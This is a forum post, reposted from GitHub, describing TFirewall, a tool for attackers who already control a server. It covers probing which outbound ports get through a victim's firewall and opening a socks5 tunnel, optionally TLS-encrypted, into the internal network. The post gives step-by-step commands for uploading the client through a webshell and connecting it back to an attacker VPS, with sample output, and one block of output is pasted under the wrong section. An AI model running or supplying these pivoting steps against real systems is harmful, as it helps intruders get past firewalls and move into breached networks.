安全矩阵

 找回密码
 立即注册
搜索
查看: 2018|回复: 0

防火墙出网探测工具

[复制链接]

251

主题

270

帖子

1797

积分

金牌会员

Rank: 6Rank: 6

积分
1797
发表于 2022-1-29 10:41:21 | 显示全部楼层 |阅读模式
本帖最后由 Meng0f 于 2022-1-29 10:44 编辑

防火墙出网探测工具
转载于:FunnyWolf HACK之道 2022-01-28 08:30
​作者:FunnyWolf,转载于github
TFirewall是测试已控主机哪些端口可以出网及建立内网socks5代理的工具.工具主体使用golang开发,工具包含客户端及服务端,适用于windows,linux,x64,x86.
使用方法
出网检测

    1. <li>将tfs_linux_amd64上传到VPS服务器(假设VPS的IP地址10.10.10.10)

    2. </li><li>直接运行.\tfs_linux_amd64 check启动监听,工具会自动监听常用的TOP10端口,或通过 .\tfs_linux_amd64 check 20-23,53,80自定义监听端口

    3. </li><li>服务端打印如下信息表示监听成功</li>
    复制代码


root@taZ:~# ./tfs_linux_amd64 check 20-23,53,80Check Server listening:  [20 21 22 23 53 80]

    1. <ul><li>通过WEBShell管理工具将tfc_windows_386.exe上传到已控服务器

    2. </li><li>运行tfc_windows_386.exe check 10.10.10.10测试TOP10端口哪些可以出网

    3. </li></ul><blockquote>服务端对应命令.\tfs_linux_amd64 check
    复制代码


root@iZj6cbux9hc5eo9oyud2taZ:~# ./tfs_linux_amd64 check 23,80-82
  1. Check Server listening:  [23 80 81]
  2. RecvTCP On 172.17.20.209:23 From 175.132.138.137:16918
  3. RecvTCP On 172.17.20.209:80 From 175.132.138.137:50641
  4. RecvTCP On 172.17.20.209:81 From 175.132.138.137:38747
  5. RecvUDP On [::]:23 From 175.167.138.137:28822
  6. RecvUDP On [::]:80 From 175.167.138.137:26831
  7. RecvUDP On [::]:81 From 175.167.138.137:26832
复制代码


内网socks5代理

  •         将tfs_linux_amd64上传到VPS服务器(假设VPS的IP地址10.10.10.10)
  •         通过 .\tfs_linux_amd64 socks5 80 1080在80端口启动控制监听,1080启动内网socks5端口
  •         服务端打印如下信息表示监听成功
root@vultr:~# ./tfs_linux_amd64 socks5 80 1080Control Listening:  80Socks5 Listening:  1080

  •         通过WEBShell管理工具将``tfc_windows_386.exe```上传到已控服务器
  •         运行tfc_windows_386.exe socks5 10.10.10.10 80连接服务端
  •         使用10.10.10.10:1080作为内网是socks5代理(11.11.11.11是该内网出口路由器的IP地址)
root@vultr:~# ./tfs_linux_amd64 socks5 80 1080
  1. Check Server listening:  [23 80 81]
  2. RecvTCP On 172.17.20.209:23 From 175.132.138.137:16918
  3. RecvTCP On 172.17.20.209:80 From 175.132.138.137:50641
  4. RecvTCP On 172.17.20.209:81 From 175.132.138.137:38747
  5. RecvUDP On [::]:23 From 175.167.138.137:28822
  6. RecvUDP On [::]:80 From 175.167.138.137:26831
  7. RecvUDP On [::]:81 From 175.167.138.137:26832
复制代码

内网socks5代理(TLS加密)

  •         将tfs_linux_amd64上传到VPS服务器(假设VPS的IP地址10.10.10.10)
  •         将server.pem(tls公钥),server.key(tls私钥)上传到server_linux_x64相同目录
  •         通过 .\tfs_linux_amd64 socks5 80 1080 tls在80端口启动控制监听,1080启动内网socks5端口
  •         服务端打印如下信息表示监听成功
root@vultr:~# ./tfs_linux_amd64 socks5 80 1080
  1. Control Listening:  80
  2. Socks5 Listening:  1080
复制代码


  •         通过WEBShell管理工具将tfc_windows_386.exe上传到已控服务器
  •         运行tfc_windows_386.exe socks5 10.10.10.10 80 tls连接服务端
  •         使用10.10.10.10:1080作为内网是socks5代理(11.11.11.11是该内网出口路由器的IP地址)
root@vultr:~# ./tfs_linux_amd64 socks5 80 1080
  1. Control Listening:  80
  2. Socks5 Listening:  1080
  3. Socks5 new socket from :  11.11.11.11:55943
  4. Control new socket from :  11.11.11.11:55789
复制代码

已测试server

  •         ubuntu 18
client

  •         Windows 10
  •         ubuntu 16
  •         kali


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-23 23:57 , Processed in 0.011732 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表